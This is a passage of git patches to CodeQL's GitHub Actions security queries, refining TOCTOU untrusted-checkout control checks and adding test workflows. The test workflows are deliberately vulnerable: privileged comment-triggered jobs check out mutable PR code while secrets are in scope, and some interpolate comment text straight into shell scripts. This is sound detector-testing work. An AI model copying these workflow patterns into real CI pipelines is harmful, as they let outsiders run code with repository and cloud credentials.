b/ql/src/Security/CWE-088/ArgumentInjectionMedium.ql @@ -8,6 +8,7 @@ * @id actions/argument-injection/medium * @tags actions * security + * experimental * external/cwe/cwe-088 */ From a3cf8766ffe7d42e8ac77cc22ad3e1f6f404a5b3 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Thu, 3 Oct 2024 14:42:23 +0200 Subject: [PATCH 568/707] Bump qlpack versions --- ql/lib/qlpack.yml | 2 +- ql/src/qlpack.yml | 2 +- 2 files changed, 2 insertions(+), 2 deletions(-) diff --git a/ql/lib/qlpack.yml b/ql/lib/qlpack.yml index 49cb71df1b29..0be2657c99e5 100644 --- a/ql/lib/qlpack.yml +++ b/ql/lib/qlpack.yml @@ -2,7 +2,7 @@ library: true warnOnImplicitThis: true name: github/actions-all -version: 0.1.63 +version: 0.1.64 dependencies: codeql/util: ^1.0.1 codeql/yaml: ^1.0.1 diff --git a/ql/src/qlpack.yml b/ql/src/qlpack.yml index 864c4949a124..ebdf6b364b22 100644 --- a/ql/src/qlpack.yml +++ b/ql/src/qlpack.yml @@ -1,7 +1,7 @@ --- library: false name: github/actions-queries -version: 0.1.63 +version: 0.1.64 groups: [actions, queries] suites: codeql-suites extractor: javascript From 860eda9c041162b5031c51b2f8a91c652b4fe11f Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Fri, 4 Oct 2024 18:04:13 +0200 Subject: [PATCH 569/707] Improve control checks to better account for toctou issues --- .../codeql/actions/security/ControlChecks.qll | 64 +++-- .../UntrustedCheckoutTOCTOUCritical.ql | 12 +- .../CWE-367/UntrustedCheckoutTOCTOUHigh.ql | 11 +- .../CWE-829/UntrustedCheckoutCritical.ql | 18 +- .../{deployment.yml => deployment1.yml} | 0 .../CWE-367/.github/workflows/deployment2.yml | 31 ++ .../CWE-367/.github/workflows/test0.yml | 68 +++++ .../CWE-367/.github/workflows/test1.yml | 96 +++++++ .../CWE-367/.github/workflows/test2.yml | 227 +++++++++++++++ .../CWE-367/.github/workflows/test3.yml | 271 ++++++++++++++++++ .../CWE-367/.github/workflows/test4.yml | 89 ++++++ .../CWE-367/.github/workflows/test5.yml | 209 ++++++++++++++ .../CWE-367/.github/workflows/test6.yml | 253 ++++++++++++++++ .../UntrustedCheckoutTOCTOUCritical.expected | 105 ++++++- .../UntrustedCheckoutTOCTOUHigh.expected | 2 + .../UntrustedCheckoutCritical.expected | 3 - 16 files changed, 1399 insertions(+), 60 deletions(-) rename ql/test/query-tests/Security/CWE-367/.github/workflows/{deployment.yml => deployment1.yml} (100%) create mode 100644 ql/test/query-tests/Security/CWE-367/.github/workflows/deployment2.yml create mode 100644 ql/test/query-tests/Security/CWE-367/.github/workflows/test0.yml create mode 100644 ql/test/query-tests/Security/CWE-367/.github/workflows/test1.yml create mode 100644 ql/test/query-tests/Security/CWE-367/.github/workflows/test2.yml create mode 100644 ql/test/query-tests/Security/CWE-367/.github/workflows/test3.yml create mode 100644 ql/test/query-tests/Security/CWE-367/.github/workflows/test4.yml create mode 100644 ql/test/query-tests/Security/CWE-367/.github/workflows/test5.yml create mode 100644 ql/test/query-tests/Security/CWE-367/.github/workflows/test6.yml diff --git a/ql/lib/codeql/actions/security/ControlChecks.qll b/ql/lib/codeql/actions/security/ControlChecks.qll index 801ccb6e9868..86de44c3b5ca 100644 --- a/ql/lib/codeql/actions/security/ControlChecks.qll +++ b/ql/lib/codeql/actions/security/ControlChecks.qll @@ -1,30 +1,44 @@ import actions -string any_relevant_category() { +string any_category() { result = [ "untrusted-checkout", "output-clobbering", "envpath-injection", "envvar-injection", "command-injection", "argument-injection", "code-injection", "cache-poisoning", - "untrusted-checkout-toctou", "artifact-poisoning" + "untrusted-checkout-toctou", "artifact-poisoning", "artifact-poisoning-toctou" ] } -string any_non_toctou_category() { - result = any_relevant_category() and not result = "untrusted-checkout-toctou" +string non_toctou_category() { + result = any_category() and not result = "untrusted-checkout-toctou" } -string any_relevant_event() { +string toctou_category() { result = ["untrusted-checkout-toctou", "artifact-poisoning-toctou"] } + +string any_event() { result = actor_not_attacker_event() or result = actor_is_attacker_event() } + +string actor_is_attacker_event() { result = [ + // actor and attacker have to be the same "pull_request_target", - "issue_comment", - "pull_request_comment", "workflow_run", + "discussion_comment", + "discussion", "issues", "fork", - "watch", - "discussion_comment", - "discussion" + "watch" + ] +} + +string actor_not_attacker_event() { + result = + [ + // actor and attacker can be different + // actor may be a collaborator, but the attacker is may be the author of the PR that gets commented + // therefore it may be vulnerable to TOCTOU races where the actor reviews one thing and the attacker changes it + "issue_comment", + "pull_request_comment", ] } @@ -81,7 +95,9 @@ abstract class AssociationCheck extends ControlCheck { // - they are effective against pull requests and workflow_run (since these are triggered by pull_requests) since they can control who is making the PR // - they are not effective against issue_comment since the author of the comment may not be the same as the author of the PR override predicate protectsCategoryAndEvent(string category, string event) { - event = ["pull_request_target", "workflow_run"] and category = any_relevant_category() + event = actor_is_attacker_event() and category = any_category() + or + event = actor_not_attacker_event() and category = non_toctou_category() } } @@ -90,7 +106,9 @@ abstract class ActorCheck extends ControlCheck { // - they are effective against pull requests and workflow_run (since these are triggered by pull_requests) since they can control who is making the PR // - they are not effective against issue_comment since the author of the comment may not be the same as the author of the PR override predicate protectsCategoryAndEvent(string category, string event) { - event = ["pull_request_target", "workflow_run"] and category = any_relevant_category() + event = actor_is_attacker_event() and category = any_category() + or + event = actor_not_attacker_event() and category = non_toctou_category() } } @@ -106,8 +124,9 @@ abstract class PermissionCheck extends ControlCheck { // - they are effective against pull requests/workflow_run since they can control who can make changes // - they are not effective against issue_comment since the author of the comment may not be the same as the author of the PR override predicate protectsCategoryAndEvent(string category, string event) { - event = ["pull_request_target", "workflow_run", "issue_comment"] and - category = any_relevant_category() + event = actor_is_attacker_event() and category = any_category() + or + event = actor_not_attacker_event() and category = non_toctou_category() } } @@ -115,7 +134,9 @@ abstract class LabelCheck extends ControlCheck { // checks if the issue/pull_request is labeled, which implies that it could have been approved // - they dont protect against mutation attacks override predicate protectsCategoryAndEvent(string category, string event) { - event = ["pull_request_target", "workflow_run"] and category = any_non_toctou_category() + event = actor_is_attacker_event() and category = any_category() + or + event = actor_not_attacker_event() and category = non_toctou_category() } } @@ -123,14 +144,16 @@ class EnvironmentCheck extends ControlCheck instanceof Environment { // Environment checks are not effective against any mutable attacks // they do actually protect against untrusted code execution (sha) override predicate protectsCategoryAndEvent(string category, string event) { - event = ["pull_request_target", "workflow_run"] and category = any_non_toctou_category() + event = actor_is_attacker_event() and category = any_category() + or + event = actor_not_attacker_event() and category = non_toctou_category() } } abstract class CommentVsHeadDateCheck extends ControlCheck { override predicate protectsCategoryAndEvent(string category, string event) { // by itself, this check is not effective against any attacks - none() + event = actor_not_attacker_event() and category = toctou_category() } } @@ -187,7 +210,7 @@ class PullRequestTargetRepositoryIfCheck extends RepositoryCheck instanceof If { } override predicate protectsCategoryAndEvent(string category, string event) { - event = "pull_request_target" and category = any_relevant_category() + event = "pull_request_target" and category = any_category() } } @@ -205,7 +228,7 @@ class WorkflowRunRepositoryIfCheck extends RepositoryCheck instanceof If { } override predicate protectsCategoryAndEvent(string category, string event) { - event = "workflow_run" and category = any_relevant_category() + event = "workflow_run" and category = any_category() } } @@ -250,6 +273,9 @@ class PermissionActionCheck extends PermissionCheck instanceof UsesStep { not exists(this.getArgument("permission-level")) or this.getArgument("permission-level") = ["write", "admin"] ) + or + this.getCallee() = "actions/github-script" and + this.getArgument("script").splitAt("\n").matches("%getCollaboratorPermissionLevel%") } } diff --git a/ql/src/Security/CWE-367/UntrustedCheckoutTOCTOUCritical.ql b/ql/src/Security/CWE-367/UntrustedCheckoutTOCTOUCritical.ql index 11897c464bf9..16fb2606af79 100644 --- a/ql/src/Security/CWE-367/UntrustedCheckoutTOCTOUCritical.ql +++ b/ql/src/Security/CWE-367/UntrustedCheckoutTOCTOUCritical.ql @@ -18,18 +18,14 @@ import codeql.actions.security.ControlChecks query predicate edges(Step a, Step b) { a.getNextStep() = b } -from - LocalJob job, MutableRefCheckoutStep checkout, PoisonableStep step, ControlCheck check, - Event event +from MutableRefCheckoutStep checkout, PoisonableStep step, Event event where - job.getAStep() = checkout and // the checked-out code may lead to arbitrary code execution checkout.getAFollowingStep() = step and // the checkout occurs in a privileged context inPrivilegedContext(checkout, event) and // the mutable checkout step is protected by an Insufficient access check - check.protects(checkout, event, "untrusted-checkout") and - not check.protects(checkout, event, "untrusted-checkout-toctou") + exists(ControlCheck check1 | check1.protects(checkout, event, "untrusted-checkout")) and + not exists(ControlCheck check2 | check2.protects(checkout, event, "untrusted-checkout-toctou")) select step, checkout, step, - "Insufficient protection against execution of untrusted code on a privileged workflow on check $@.", - check, check.toString() + "Insufficient protection against execution of untrusted code on a privileged workflow." diff --git a/ql/src/Security/CWE-367/UntrustedCheckoutTOCTOUHigh.ql b/ql/src/Security/CWE-367/UntrustedCheckoutTOCTOUHigh.ql index 5956b52ccbe4..d4ed49e497aa 100644 --- a/ql/src/Security/CWE-367/UntrustedCheckoutTOCTOUHigh.ql +++ b/ql/src/Security/CWE-367/UntrustedCheckoutTOCTOUHigh.ql @@ -16,17 +16,14 @@ import codeql.actions.security.UntrustedCheckoutQuery import codeql.actions.security.PoisonableSteps import codeql.actions.security.ControlChecks -from LocalJob job, MutableRefCheckoutStep checkout, ControlCheck check, Event event +from MutableRefCheckoutStep checkout, Event event where - job.getAStep() = checkout and // there are no evidences that the checked-out gets executed not checkout.getAFollowingStep() instanceof PoisonableStep and // the checkout occurs in a privileged context inPrivilegedContext(checkout, event) and - event = job.getATriggerEvent() and // the mutable checkout step is protected by an Insufficient access check - check.protects(checkout, event, "untrusted-checkout") and - not check.protects(checkout, event, "untrusted-checkout-toctou") + exists(ControlCheck check1 | check1.protects(checkout, event, "untrusted-checkout")) and + not exists(ControlCheck check2 | check2.protects(checkout, event, "untrusted-checkout-toctou")) select checkout, - "Insufficient protection against execution of untrusted code on a privileged workflow on step $@.", - check, check.toString() + "Insufficient protection against execution of untrusted code on a privileged workflow." diff --git a/ql/src/Security/CWE-829/UntrustedCheckoutCritical.ql b/ql/src/Security/CWE-829/UntrustedCheckoutCritical.ql index f9f951917955..37628a29489a 100644 --- a/ql/src/Security/CWE-829/UntrustedCheckoutCritical.ql +++ b/ql/src/Security/CWE-829/UntrustedCheckoutCritical.ql @@ -26,22 +26,6 @@ where checkout.getAFollowingStep() = step and // the checkout occurs in a privileged context inPrivilegedContext(step, event) and - ( - // issue_comment: check for date comparison checks and actor/access control checks - event.getName() = "issue_comment" and - not exists(ControlCheck check, CommentVsHeadDateCheck date_check | - ( - check instanceof ActorCheck or - check instanceof AssociationCheck or - check instanceof PermissionCheck - ) and - check.dominates(step) and - date_check.dominates(step) - ) - or - // not issue_comment triggered workflows - not event.getName() = "issue_comment" and - not exists(ControlCheck check | check.protects(step, event, "untrusted-checkout")) - ) + not exists(ControlCheck check | check.protects(step, event, "untrusted-checkout")) select step, checkout, step, "Execution of untrusted code on a privileged workflow. $@", event, event.getLocation().getFile().toString() diff --git a/ql/test/query-tests/Security/CWE-367/.github/workflows/deployment.yml b/ql/test/query-tests/Security/CWE-367/.github/workflows/deployment1.yml similarity index 100% rename from ql/test/query-tests/Security/CWE-367/.github/workflows/deployment.yml rename to ql/test/query-tests/Security/CWE-367/.github/workflows/deployment1.yml diff --git a/ql/test/query-tests/Security/CWE-367/.github/workflows/deployment2.yml b/ql/test/query-tests/Security/CWE-367/.github/workflows/deployment2.yml new file mode 100644 index 000000000000..5c6e28eafc8d --- /dev/null +++ b/ql/test/query-tests/Security/CWE-367/.github/workflows/deployment2.yml @@ -0,0 +1,31 @@ +# https://github.com/AdnaneKhan/ActionsTOCTOU/blob/main/.github/workflows/deployment_victim.yml +name: Environment PR Check + +on: + pull_request_target: + branches: + - main + paths: + - 'README.md' + workflow_dispatch: +jobs: + test: + environment: Public CI + runs-on: ubuntu-latest + steps: + - name: Checkout from PR branch + uses: actions/checkout@v4 + with: + repository: ${{ github.event.pull_request.head.repo.full_name }} + ref: ${{ github.event.pull_request.head.sha }} + + - name: Set Node.js 20.x for GitHub Action + uses: actions/setup-node@v4 + with: + node-version: 20.x + + - name: installing node_modules + run: cd deployment_example && npm install + + - name: Build GitHub Action + run: cd deployment_example && npm run build diff --git a/ql/test/query-tests/Security/CWE-367/.github/workflows/test0.yml b/ql/test/query-tests/Security/CWE-367/.github/workflows/test0.yml new file mode 100644 index 000000000000..a4acd7387660 --- /dev/null +++ b/ql/test/query-tests/Security/CWE-367/.github/workflows/test0.yml @@ -0,0 +1,68 @@ +# https://github.com/AdnaneKhan/ActionsTOCTOU/blob/main/.github/workflows/comment_victim.yml +name: Comment Triggered Test +on: + issue_comment: + types: [created] +permissions: 'write-all' +jobs: + test1: + if: ${{ github.event.issue.pull_request && contains(fromJson('["MEMBER", "OWNER"]'), github.event.comment.author_association) && startsWith(github.event.comment.body, '/run-tests ') }} + runs-on: ubuntu-latest + steps: + + - uses: actions/github-script@v6 + name: Get PR branch + id: issue + with: + script: | + const pr = context.payload.issue.number + const data = await github.rest.pulls.get({ + owner: context.repo.owner, + repo: context.repo.repo, + pull_number: pr + }) + return { + ref: data.data.head.ref, + sha: data.data.head.sha, + } + - uses: actions/checkout@v4 + with: + submodules: recursive + ref: ${{ fromJson(steps.issue.outputs.result).sha }} + - run: bash comment_example/tests.sh + + test2: + if: ${{ github.event.issue.pull_request && contains(fromJson('["MEMBER", "OWNER"]'), github.event.comment.author_association) && startsWith(github.event.comment.body, '/run-tests ') }} + runs-on: ubuntu-latest + steps: + + - uses: actions/github-script@v6 + name: Get PR branch + id: issue + with: + script: | + const pr = context.payload.issue.number + const data = await github.rest.pulls.get({ + owner: context.repo.owner, + repo: context.repo.repo, + pull_number: pr + }) + return { + ref: data.data.head.ref, + sha: data.data.head.sha, + } + - uses: actions/checkout@v4 + with: + submodules: recursive + ref: ${{ fromJson(steps.issue.outputs.result).ref }} + - run: bash comment_example/tests.sh + + test3: + if: ${{ github.event.issue.pull_request && contains(fromJson('["MEMBER", "OWNER"]'), github.event.comment.author_association) && startsWith(github.event.comment.body, '/run-tests ') }} + runs-on: ubuntu-latest + steps: + - uses: actions/checkout@v4 + with: + submodules: recursive + ref: "refs/pull/${{ github.event.number }}/merge" + - run: bash comment_example/tests.sh diff --git a/ql/test/query-tests/Security/CWE-367/.github/workflows/test1.yml b/ql/test/query-tests/Security/CWE-367/.github/workflows/test1.yml new file mode 100644 index 000000000000..878b83779613 --- /dev/null +++ b/ql/test/query-tests/Security/CWE-367/.github/workflows/test1.yml @@ -0,0 +1,96 @@ +name: Test + +on: + + issue_comment: + types: [created] + +jobs: + + deploy: + name: Update deployment + if: > + github.event.issue.pull_request && + (contains(github.event.comment.body, '/deploy') || contains(github.event.comment.body, '/rollback')) && + contains(github.event.issue.labels.*.name, 'Deployment Update') && + github.event.comment.user.type != 'Bot' && + ( + github.event.issue.author_association == 'OWNER' || + github.event.issue.author_association == 'COLLABORATOR' || + github.event.issue.author_association == 'MEMBER' + ) + runs-on: [self-hosted, production] + + permissions: + contents: write + issues: write + pull-requests: write + statuses: write + + steps: + + - name: Check comment keywords + shell: bash + env: + COMMENT_BODY: ${{ github.event.comment.body }} + PR_COMMENT_ALLOW_LIST: ${{ secrets.PR_COMMENT_ALLOW_LIST }} + run: | + function list_subset { local list1="$1"; local list2="$2"; result=0; for item in $list2; do if ! [[ $list1 =~ (^|[[:space:]])"$item"($|[[:space:]]) ]]; then result=1; fi; done; return $result; } + + if `list_subset "echo $PR_COMMENT_ALLOW_LIST" "echo $COMMENT_BODY"` ; then + echo "Command keywords allowed. Proceeding!" + else + echo "Command keywords not allowed. Skipping!" + exit 1 + fi + + - name: Get environment from comment + id: environment + shell: bash + env: + COMMENT_BODY: ${{ github.event.comment.body }} + COMMENT_AT: ${{ github.event.comment.created_at }} + GH_REPO: ${{ github.repository }} + PR_NUMBER: ${{ github.event.issue.number }} + GH_TOKEN: ${{ secrets.GITHUB_TOKEN }} + run: | + pr="$(gh api /repos/${GH_REPO}/pulls/${PR_NUMBER})" + head_sha="$(echo "$pr" | jq -r .head.sha)" + pushed_at="$(echo "$pr" | jq -r .pushed_at)" + + if [[ $(date -d "$pushed_at" +%s) -gt $(date -d "$COMMENT_AT" +%s) ]]; then + echo "Deployment not allowed because the PR was pushed to (at $pushed_at) after the triggering comment was issued (at $COMMENT_AT)" + exit 1 + fi + + target=$(echo "$COMMENT_BODY" | sed 's/.* //') && \ + deploy_type=$(echo "$COMMENT_BODY" | sed 's/ .*//') + + if [[ $target == "scorer" ]]; then + echo "env=async scorer" >> $GITHUB_OUTPUT + else + env=$(echo "$target") + echo "env=$env" >> $GITHUB_OUTPUT + fi + + if [[ $deploy_type == "/deploy" ]]; then + echo "depl=deployment" >> $GITHUB_OUTPUT + elif [[ $deploy_type == "/rollback" ]]; then + echo "depl=rollback" >> $GITHUB_OUTPUT + else + echo "depl=unknown deployment type" >> $GITHUB_OUTPUT + fi + + echo "head_sha=$head_sha" >> $GITHUB_OUTPUT + + - name: Checkout PR branch + if: contains(github.event.comment.body, '/deploy') + uses: actions/checkout@692973e3d937129bcbf40652eb9f2f61becf3332 # v4 + with: + ref: ${{ steps.environment.outputs.head_sha }} + + - name: Environment setup + uses: ./.github/actions/setup-env + with: + azure_creds: ${{ secrets.AZURE_CREDENTIALS }} + diff --git a/ql/test/query-tests/Security/CWE-367/.github/workflows/test2.yml b/ql/test/query-tests/Security/CWE-367/.github/workflows/test2.yml new file mode 100644 index 000000000000..6f03a0e966a1 --- /dev/null +++ b/ql/test/query-tests/Security/CWE-367/.github/workflows/test2.yml @@ -0,0 +1,227 @@ +name: Autodeploy Model to AML + +on: + + issue_comment: + types: [created] + +jobs: + + security-checks: + + name: Carry out security checks + if: >- + ${{ + github.event.issue.pull_request && + (contains(github.event.comment.body, '/deploy') || contains(github.event.comment.body, '/rollback')) && + contains(github.event.issue.labels.*.name, 'Deployment Update') && + github.event.comment.user.type != 'Bot' && + github.event.pull_request.author_association != 'FIRST_TIMER' && + github.event.pull_request.author_association != 'FIRST_TIME_CONTRIBUTOR' && + github.event.pull_request.author_association != 'MANNEQUIN' && + github.event.pull_request.author_association != 'NONE' + }} + + runs-on: ubuntu-latest + + defaults: + run: + shell: bash + + permissions: + contents: write + issues: write + pull-requests: write + + steps: + + - name: Install GH CLI + uses: dev-hanz-ops/install-gh-cli-action@8fff9050dae2d81b38f94500d8b74ad1d1d47410 #v0.2.0 + + - name: Install jq + run: sudo apt-get update && sudo apt-get install -y jq + + - name: Check comment keywords + env: + COMMENT_BODY: ${{ github.event.comment.body }} + PR_COMMENT_ALLOW_LIST: ${{ secrets.PR_COMMENT_ALLOW_LIST }} + run: | + function list_subset { local list1="$1"; local list2="$2"; result=0; for item in $list2; do if ! [[ $list1 =~ (^|[[:space:]])"$item"($|[[:space:]]) ]]; then result=1; fi; done; return $result; } + + if `list_subset "echo $PR_COMMENT_ALLOW_LIST" "echo $COMMENT_BODY"` ; then + echo "Command keywords allowed. Proceeding!" + else + echo "Command keywords not allowed. Skipping!" + exit 1 + fi + + - name: Check for conflicting pushes + id: environment + shell: bash + env: + COMMENT_BODY: ${{ github.event.comment.body }} + COMMENT_AT: ${{ github.event.comment.created_at }} + GH_REPO: ${{ github.repository }} + PR_NUMBER: ${{ github.event.issue.number }} + GH_TOKEN: ${{ secrets.GITHUB_TOKEN }} + run: | + pr="$(gh api /repos/${GH_REPO}/pulls/${PR_NUMBER})" + pushed_at="$(echo "$pr" | jq -r .pushed_at)" + + if [[ $(date -d "$pushed_at" +%s) -gt $(date -d "$COMMENT_AT" +%s) ]]; then + echo "Deployment not allowed because the PR was pushed to (at $pushed_at) after the triggering comment was issued (at $COMMENT_AT)" + exit 1 + fi + + deploy: + + name: Update deployment + needs: security-checks + runs-on: [self-hosted, production] + + permissions: + contents: write + issues: write + pull-requests: write + statuses: write + + steps: + + - name: Get PR branch + uses: xt0rted/pull-request-comment-branch@d97294d304604fa98a2600a6e2f916a84b596dc7 # v2.0.0 + id: comment-branch + + - name: Set latest commit status as pending + uses: myrotvorets/set-commit-status-action@3730c0a348a2ace3c110851bed53331bc6406e9f # v2.0.1 + with: + sha: ${{ steps.comment-branch.outputs.head_sha }} + token: ${{ secrets.GITHUB_TOKEN }} + status: pending + + - name: Checkout main + if: contains(github.event.comment.body, '/rollback') + uses: actions/checkout@692973e3d937129bcbf40652eb9f2f61becf3332 # v4 + + - name: Checkout PR branch + if: contains(github.event.comment.body, '/deploy') + uses: actions/checkout@692973e3d937129bcbf40652eb9f2f61becf3332 # v4 + with: + ref: ${{ steps.comment-branch.outputs.head_ref }} + + - name: Get environment from comment + id: environment + shell: bash + env: + COMMENT_BODY: ${{ github.event.comment.body }} + run: | + target=$(echo "$COMMENT_BODY" | sed 's/.* //') && \ + deploy_type=$(echo "$COMMENT_BODY" | sed 's/ .*//') + + if [[ $target == "scorer" ]]; then + echo "env=async scorer" >> $GITHUB_OUTPUT + else + env=$(echo "$target") + echo "env=$env" >> $GITHUB_OUTPUT + fi + + if [[ $deploy_type == "/deploy" ]]; then + echo "depl=deployment" >> $GITHUB_OUTPUT + elif [[ $deploy_type == "/rollback" ]]; then + echo "depl=rollback" >> $GITHUB_OUTPUT + else + echo "depl=unknown deployment type" >> $GITHUB_OUTPUT + fi + + - name: Get email of actor + id: email + run: | + email="${{ github.actor }}@github.com" + echo "email=$email" >> $GITHUB_OUTPUT + + - name: Lookup Slack ID + id: slack-id + env: + SLACK_BOT_TOKEN: ${{ secrets.SLACK_BOT_TOKEN }} + run: | + slack_id=$(curl -s -H "Authorization: Bearer $SLACK_BOT_TOKEN" "https://slack.com/api/users.lookupByEmail?email=${{ steps.email.outputs.email }}" | jq -r '.user.id') + echo "slack-id=$slack_id" >> $GITHUB_OUTPUT + + - name: Notify deployment start in slack + id: slack-initiate + uses: slackapi/slack-github-action@37ebaef184d7626c5f204ab8d3baff4262dd30f0 # v1.27.0 + with: + channel-id: 'C05N5U3HH2M' # platform-health-ml-ops + payload: | + { + "blocks": [ + { + "type": "section", + "text": { + "type": "mrkdwn", + "text": "<@${{ steps.slack-id.outputs.slack-id }}>'s ${{ steps.environment.outputs.depl }} of <${{ github.event.issue.html_url }}|${{ github.event.issue.title }} #${{ github.event.issue.number }}> to ${{ steps.environment.outputs.env }} is in progress..." + } + } + ] + } + env: + SLACK_BOT_TOKEN: ${{ secrets.SLACK_BOT_TOKEN }} + + - name: Environment setup + uses: ./.github/actions/setup-env + with: + azure_creds: ${{ secrets.AZURE_CREDENTIALS }} + + - name: Deploy server + if: >- + ${{ + (contains(github.event.comment.body, '/deploy to') || + contains(github.event.comment.body, '/rollback')) && + !contains(github.event.comment.body, 'scorer') + }} + env: + BOT_TOKEN: ${{ secrets.GITHUB_TOKEN }} + PR_NUMBER: ${{ github.event.issue.number }} + COMMENT_BODY: ${{ github.event.comment.body }} + run: poetry run python server.py --endpoint_location=remote --autodeploy=True + + - name: Deploy scorer + if: >- + ${{ + contains(github.event.comment.body, '/deploy as async scorer') || + contains(github.event.comment.body, '/rollback async scorer') + }} + env: + BOT_TOKEN: ${{ secrets.GITHUB_TOKEN }} + PR_NUMBER: ${{ github.event.issue.number }} + run: poetry run python scorer.py --as_pipeline=True --schedule=True --autodeploy=True + + - name: Set latest commit status as ${{ job.status }} + uses: myrotvorets/set-commit-status-action@3730c0a348a2ace3c110851bed53331bc6406e9f # v2.0.1 + if: always() + with: + sha: ${{ steps.comment-branch.outputs.head_sha }} + token: ${{ secrets.GITHUB_TOKEN }} + status: ${{ job.status }} + + - name: Report deployment outcome in slack + uses: slackapi/slack-github-action@37ebaef184d7626c5f204ab8d3baff4262dd30f0 # v1.27.0 + if: always() + with: + channel-id: 'C05N5U3HH2M' # platform-health-ml-ops + payload: | + { + "blocks": [ + { + "type": "section", + "text": { + "type": "mrkdwn", + "text": "<@${{ steps.slack-id.outputs.slack-id }}>'s ${{ steps.environment.outputs.depl }} of <${{ github.event.issue.html_url }}|${{ github.event.issue.title }} #${{ github.event.issue.number }}> to ${{ steps.environment.outputs.env }} is complete!\n*Status: ${{ job.status }}*" + } + } + ] + } + env: + SLACK_BOT_TOKEN: ${{ secrets.SLACK_BOT_TOKEN }} + + - name: prune docker images + run: docker system prune --all --force diff --git a/ql/test/query-tests/Security/CWE-367/.github/workflows/test3.yml b/ql/test/query-tests/Security/CWE-367/.github/workflows/test3.yml new file mode 100644 index 000000000000..0be96a4140ef --- /dev/null +++ b/ql/test/query-tests/Security/CWE-367/.github/workflows/test3.yml @@ -0,0 +1,271 @@ +name: Kickoff custom pipeline + +on: + + issue_comment: + types: [created] + +jobs: + + security-checks: + + name: Carry out security checks + if: >- + ${{ + github.event.issue.pull_request && + contains(github.event.comment.body, '/kickoff') && + contains(github.event.issue.labels.*.name, 'Pipeline Kickoff') && + github.event.comment.user.type != 'Bot' && + github.event.pull_request.author_association != 'FIRST_TIMER' && + github.event.pull_request.author_association != 'FIRST_TIME_CONTRIBUTOR' && + github.event.pull_request.author_association != 'MANNEQUIN' && + github.event.pull_request.author_association != 'NONE' + }} + + runs-on: ubuntu-latest + + defaults: + run: + shell: bash + + permissions: + contents: write + issues: write + pull-requests: write + + steps: + + - name: Check for conflicting pushes + id: environment + shell: bash + env: + COMMENT_BODY: ${{ github.event.comment.body }} + COMMENT_AT: ${{ github.event.comment.created_at }} + GH_REPO: ${{ github.repository }} + PR_NUMBER: ${{ github.event.issue.number }} + GH_TOKEN: ${{ secrets.GITHUB_TOKEN }} + run: | + pr="$(gh api /repos/${GH_REPO}/pulls/${PR_NUMBER})" + pushed_at="$(echo "$pr" | jq -r .pushed_at)" + + if [[ $(date -d "$pushed_at" +%s) -gt $(date -d "$COMMENT_AT" +%s) ]]; then + echo "Deployment not allowed because the PR was pushed to (at $pushed_at) after the triggering comment was issued (at $COMMENT_AT)" + exit 1 + fi + + - name: Get PR branch + uses: xt0rted/pull-request-comment-branch@d97294d304604fa98a2600a6e2f916a84b596dc7 # v2.0.0 + id: comment-branch + + - name: Checkout PR branch + uses: actions/checkout@692973e3d937129bcbf40652eb9f2f61becf3332 # v4 + with: + ref: ${{ steps.comment-branch.outputs.head_ref }} + + - name: Install GH CLI + uses: dev-hanz-ops/install-gh-cli-action@8fff9050dae2d81b38f94500d8b74ad1d1d47410 #v0.2.0 + + - name: Check comment keywords + env: + COMMENT_BODY: ${{ github.event.comment.body }} + PR_COMMENT_ALLOW_LIST: ${{ secrets.PR_COMMENT_ALLOW_LIST }} + run: | + function list_subset { local list1="$1"; local list2="$2"; result=0; for item in $list2; do if ! [[ $list1 =~ (^|[[:space:]])"$item"($|[[:space:]]) ]]; then result=1; fi; done; return $result; } + full_allowlist="$PR_COMMENT_ALLOW_LIST $(ls models)" + + if `list_subset "echo $full_allowlist" "echo $COMMENT_BODY"` ; then + echo "Command keywords allowed. Proceeding!" + else + echo "Command keywords not allowed. Skipping!" + exit 1 + fi + + docker-environment-creation: + + name: Build and push docker image + needs: security-checks + if: >- + ${{ + contains(github.event.comment.body, 'rebuild') && + contains(github.event.issue.labels.*.name, 'Pipeline Kickoff') && + needs.security-checks.result == 'success' + }} + runs-on: [self-hosted, production] + + permissions: + contents: write + + defaults: + run: + # Run bash like it came from an interactive login, to make it so that + # the .bashrc gets loaded. + shell: bash -l {0} + + steps: + + - name: Get PR branch + uses: xt0rted/pull-request-comment-branch@d97294d304604fa98a2600a6e2f916a84b596dc7 # v2 + id: comment-branch + + - name: Checkout PR branch + uses: actions/checkout@692973e3d937129bcbf40652eb9f2f61becf3332 # v4 + with: + ref: ${{ steps.comment-branch.outputs.head_ref }} + + - name: Log into Azure + uses: azure/login@a65d910e8af852a8061c627c456678983e180302 # @v2.2.0 + with: + creds: ${{ secrets.AZURE_CREDENTIALS }} + + - name: Container registry login + run: | + echo "Logging into $REGISTRY" + az acr login --name ${REGISTRY} + env: + REGISTRY: ${{ secrets.DOCKER_REGISTRY }} + + - name: Prune old images + run: | + docker system prune -a -f + + - name: Create image + run: | + model=$(echo "${{ github.event.comment.body }}" | sed 's/.*kickoff //' | sed 's/ .*//') + script/build_aml_image -m $model + + - name: Push image + run: | + model=$(echo "${{ github.event.comment.body }}" | sed 's/.*kickoff //' | sed 's/ .*//') + script/push_aml_image -m $model + + kickoff-pipeline: + + name: Kickoff pipeline + needs: [security-checks, docker-environment-creation] + if: >- + ${{ + always() && + needs.security-checks.result == 'success' && + needs.docker-environment-creation.result != 'failure' && + needs.docker-environment-creation.result != 'cancelled' + }} + + runs-on: [self-hosted, production] + + permissions: + contents: write + issues: write + pull-requests: write + statuses: write + + defaults: + run: + # Run bash like it came from an interactive login, to make it so that + # the .bashrc gets loaded. + shell: bash -l {0} + + steps: + + - name: Get PR branch + uses: xt0rted/pull-request-comment-branch@d97294d304604fa98a2600a6e2f916a84b596dc7 # v2 + id: comment-branch + + - name: Set latest commit status as pending + uses: myrotvorets/set-commit-status-action@3730c0a348a2ace3c110851bed53331bc6406e9f # v2.0.1 + with: + sha: ${{ steps.comment-branch.outputs.head_sha }} + token: ${{ secrets.GITHUB_TOKEN }} + status: pending + + - name: Checkout PR branch + uses: actions/checkout@v4 + with: + ref: ${{ steps.comment-branch.outputs.head_ref }} + + - name: Get pipeline info from comment + id: pipeline-info + run: | + model=$(echo "${{ github.event.comment.body }}" | sed 's/.*kickoff //' | sed 's/ .*//') && \ + scheduling=$(echo "${{ github.event.comment.body }}" | grep schedule | wc -l) && \ + echo "mdl=$model" >> $GITHUB_OUTPUT + if [[ $scheduling == 1 ]]; then + echo "schedule=True" >> $GITHUB_OUTPUT + else + echo 